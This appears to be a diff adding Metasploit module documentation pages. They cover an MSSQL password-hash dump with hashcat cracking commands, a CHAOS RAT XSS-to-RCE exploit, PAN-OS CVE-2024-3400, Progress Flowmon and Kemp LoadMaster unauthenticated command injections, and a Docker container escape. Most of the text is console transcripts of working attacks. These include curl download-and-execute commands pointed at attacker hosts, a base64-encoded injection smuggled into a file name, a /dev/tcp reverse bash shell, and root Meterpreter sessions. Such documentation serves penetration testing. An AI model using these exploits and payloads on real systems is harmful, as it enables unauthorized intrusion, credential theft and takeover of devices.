+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Directly querying a machine:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Different MSSQL Versions have different hash formats. For example:
+
+MSSQL (2000): 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+MSSQL (2005): 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+MSSQL (2012 and later): 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+
+To decrypt:
+Save into a `passwords.txt` file
+Run with hashcat, based on the MSSQL Version:
+`hashcat --force -m 131 ./hashes.txt ./passwords.txt` (MSSQL 2000)
+`hashcat --force -m 132 ./hashes.txt ./passwords.txt` (MSSQL 2005)
+`hashcat --force -m 1731 ./hashes.txt ./passwords.txt` (MSSQL 2012 and later)
@@ -0,0 +1,267 @@
+## Vulnerable Application
+
+CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
+allows generated binaries to control remote operating systems. The
+webapp contains a remote command execution vulnerability which
+can be triggered by an authenticated user when generating a new
+executable. The webapp also contains an XSS vulnerability within
+the view of a returned command being executed on an agent.
+
+Execution can happen through one of three routes:
+
+1. Provided credentials can be used to execute the RCE directly
+2. A `JWT` token from an agent can be provided to emulate a compromised
+host. If a logged in user attempts to execute a command on the host
+the returned value contains an xss payload.
+3. Similar to technique 2, an agent executable can be provided and the
+`JWT` token can be extracted.
+
+Verified against CHAOS `7d5b20ad7e58e5b525abdcb3a12514b88e87cef2` running
+in a docker container.
+
+### Install
+
+Docker image: `docker run -it -v ~/chaos-container:/database/ -v ~/chaos-container:/temp/ -e PORT=8080 -e SQLITE_DATABASE=chaos -p 8080:8080 tiagorlampert/chaos:latest`
+
+To generate an agent, login (`admin`:`admin`). Click the triple lines
+to expand the menu, select `Manage`, `Generate Client`. Click `Build`.
+
+## Verification Steps
+
+1. Install the application or run the docker image
+1. Start msfconsole
+1. Do: `use exploit/linux/http/chaos_rat_xss_to_rce`
+1. Do: `set rhost [ip]`
+1. Pick a method:
+  1. `set username [username]`, `set password [password]`
+  2. `set jwt [jwt token]`
+  3. `set agent [path to agent]`
+1. Do: `run`
+1. You should get a shell. Interaction by a CHAOS admin may be required
+
+## Options
+
+### USERNAME
+
+User to login with, default for CHAOS is `admin`.
+
+### PASSWORD
+
+Password to login with, default for CHAOS is `admin`.
+
+### JWT
+
+JWT token from an agent. Used to emulate a compromised
+host.
+
+### AGENT
+
+The path to an agent executable generated by CHAOS. Used to emulate a compromised host.
+
+## Advanced Options
+
+### AGENT_HOSTNAME
+
+Hostname for a fake agent. Defaults to `DC01`.
+
+### AGENT_USERNAME
+
+Username for a fake agent. Defaults to `Administrator`.
+
+### AGENT_USERID
+
+User ID for a fake agent. Defaults to `Administrator`.
+
+### AGENT_OS
+
+OS for a fake agent. Choices are `Windows`, or `Linux`.
+Defaults to `Windows`.
+
+## Scenarios
+
+### Docker Image
+
+#### Agent Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set agent malware2.exe
+agent => malware2.exe
+resource (chaos.rb)> set SRVHOST 111.111.10.147
+SRVHOST => 111.111.10.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./SPSVaaJxd http://111.111.10.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./SPSVaaJxd; ./SPSVaaJxd &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.10.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.10.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through Agent
+[*] Server address: 172.17.0.2
+[*] Server port: 8080
+[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDQ4MDY5MzgsInVzZXIiOiJkZWZhdWx0In0.3zlOZ8RI_YdDqEgNbt20oL7R30Ry5JgwJVCEqx0WSUA
+[*] Fake MAC for agent: f8:16:5a:23:5b:74
+[*] Listening for XSS response on: http://111.111.10.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+[*] Performing Callback Checkin
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'id', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+[+] Detected Agents
+Live Agents
+===========
+
+ IP         OS       Username    Hostname  MAC
+ --         --       --------    --------  ---
+ 111.111.1  Windows  Administra  DC01      86:89:42:d1:dc
+ 1.147               tor (Admin            :a7
+                     istrator)
+ 111.111.1  Windows  Administra  DC01      f8:16:5a:23:5b
+ 1.147               tor (Admin            :74
+                     istrator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.10.147:4444 -> 172.17.0.2:41290) at 2024-04-17 15:19:22 +0000
+
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 5.19.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+#### JWT Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+jwt => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./HVHYAPykfOV http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./HVHYAPykfOV; ./HVHYAPykfOV &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through JWT token
+[*] Fake MAC for agent: d9:74:62:8e:fc:43
+[*] Listening for XSS response on: http://111.111.63.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'whoami', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzEwMTAsIm9yaWdfaWF0IjoxNzEzMzY3NDEwLCJ1c2VyIjoiYWRtaW4ifQ.K-DCy8qNaxAHVx2Hu_Z-Ff7ZEG_TWkaount8wEM0clk
+[+] Detected Agents
+Live Agents
+===========
+
+ IP          OS       Username     Hostname  MAC
+ --          --       --------     --------  ---
+ 111.111.63  Windows  Administrat  DC01      d9:74:62:8e:fc
+ .147                 or (Adminis            :43
+                      trator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:55572) at 2024-04-17 15:32:59 +0000
+```
+
+### Credentialed Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set username admin
+username => admin
+resource (chaos.rb)> set password admin
+password => admin
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./FdfcLgdHSudl http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./FdfcLgdHSudl; ./FdfcLgdHSudl &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through direct login
+[*] Attempting login
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) at 2024-04-17 15:40:11 +0000
+
@@ -96,7 +96,7 @@ msf6 exploit(linux/http/gravcms_exec) > run
 [*] Implanting payload via scheduler feature
 [+] Scheduler successfully created ! Wait for 1 minute...
 [*] Sending stage (39282 bytes) to 172.26.240.1
-[*] Cleaning up the the scheduler...
+[*] Cleaning up the scheduler...
 [+] The scheduler config successfully cleaned up!
 [*] Meterpreter session 1 opened (172.26.253.227:4444 -> 172.26.240.1:53912) at 2021-04-11 15:32:01 +0300

@@ -0,0 +1,112 @@
+## Vulnerable Application
+This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
+allow an unauthenticated attacker to create arbitrarily named files and execute
+shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
+GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
+include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
+< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
+one hour to execute, depending on how often the telemetry service is set to run.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis).
+
+## Testing
+Boot a vulnerable PAN-OS VM or device, then authenticate to the management web service with default credentials. From the
+web dashboard, configure a GlobalProtect [Portal](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-portals/set-up-access-to-the-globalprotect-portal)
+and/or [Gateway](https://docs.paloaltonetworks.com/globalprotect/10-1/globalprotect-admin/globalprotect-gateways/configure-a-globalprotect-gateway).
+With either or both started, the `gpsvc` service will begin serving an HTTPS service on port 443 for the second
+network interface. Confirm that the web service presents a Palo Alto Networks login page when viewed. This web application
+is the target of the exploit, and the '/global-protect/login.esp' page should be accessible.
+
+The exploit has been tested against PAN-OS 10.2.9, and it should also be effective against other similarly-configured 10.2, 11.0,
+and 11.1 versions.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/panos_telemetry_cmd_exec`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `check`
+7. `exploit`
+
+## Scenarios
+
+### Linux Command
+
+Note: Ensure the target is vulnerable to unauthenticated file creation with the `check` command.
+
+Note: Since it can take up to one hour to establish code execution, the listener should be left running for that period.
+
+Note: In the standard PAN-OS configuration, the payload is delivered to the GlobalProtect interface IP, but the shell will return via a different PAN-OS management interface IP. 
+
+```
+msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options
+
+Module options (exploit/linux/http/panos_telemetry_cmd_exec):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443                        yes       The target port (TCP)
+   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      EkcxbboZMyD      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
+RHOSTS => 192.168.50.226
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
+LHOST => 192.168.50.25
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
+LPORT => 8585
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
+[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
+msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.50.25:8585 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
+[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
+[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
+[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
+[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target
+
+meterpreter > getuid 
+Server username: root
+meterpreter > sysinfo 
+Computer     : 192.168.50.216
+OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,91 @@
+## Vulnerable Application
+CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is available in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
+1. Do: `set RHOSTS <target flowmon>`
+1. Do: `set RPORT <port flowmon is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `flowmon` user.
+1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.
+
+## Scenarios
+
+### Progress Flowmon 12.2
+
+```
+msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PRIVESC    true             yes       Automatically try privesc to add sudo entry
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to Flowmon
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
+                                                  s
+   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run
+
+[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 172.174.209.101:443 can be exploited!
+[*] Detected version: 12.02.06
+[+] The target is vulnerable. Version 12.02.06 is vulnerable.
+[*] Attempting to execute payload...
+[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000
+
+meterpreter > sysinfo
+Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: flowmon
+```
@@ -0,0 +1,97 @@
+## Vulnerable Application
+CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
+1. Do: `set RHOSTS <target loadmaster>`
+1. Do: `set RPORT <port loadmaster is running on>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `bal` user.
+1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
+1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+
+``` msf
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options
+
+Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.5.134.141     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to LoadMaster
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GyzwtIbxq        no        Name to use on remote system when storing payload; cannot contain spaces or slash
+                                                  es
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run
+
+[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
+[*] Fetch handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /RByzlSnTzclKDpvXskXIrg
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 10.5.134.141:443 is vulnerable...
+[+] The target is vulnerable.
+[*] Sending payload...
+[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
+[*] Sending payload to 10.5.134.141 (curl/7.77.0)
+[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: bal
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+This module performs a container escape onto the host as the daemon user. It
+takes advantage of the SYS_MODULE capability. If that exists and the linux
+headers are available to compile on the target, then we can escape onto the host.
+
+### Creating A Testing Environment
+
+- Get a VM that you want to test on (or your own machine)
+- Install Docker
+- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload)
+```msf
+msf6 > use payload/cmd/unix/reverse_bash
+msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 
+lhost => 192.168.56.1
+msf6 payload(cmd/unix/reverse_bash) > generate -f raw
+bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+msf6 payload(cmd/unix/reverse_bash) > exploit -z
+[*] Payload Handler Started as Job 0
+msf6 payload(cmd/unix/reverse_bash) > 
+[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
+```
+- Create a privileged container (forwarding port 4444 in this example in order
+to use a bind shell from the host. Container must be the same OS as host)
+```bash
+docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+```
+- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
+```bash
+apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Install required packages into session (line 30)
+4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape`
+5. Run `set SESSION [session]`
+6. Run `check`
+7. Run `set PAYLOAD [payload]`
+8. Run `exploit`
+
+## Options
+
+### KernelModuleName
+
+The name that the kernel module will be called in the system. The default if no
+name is set is "{rand(8)}"
+
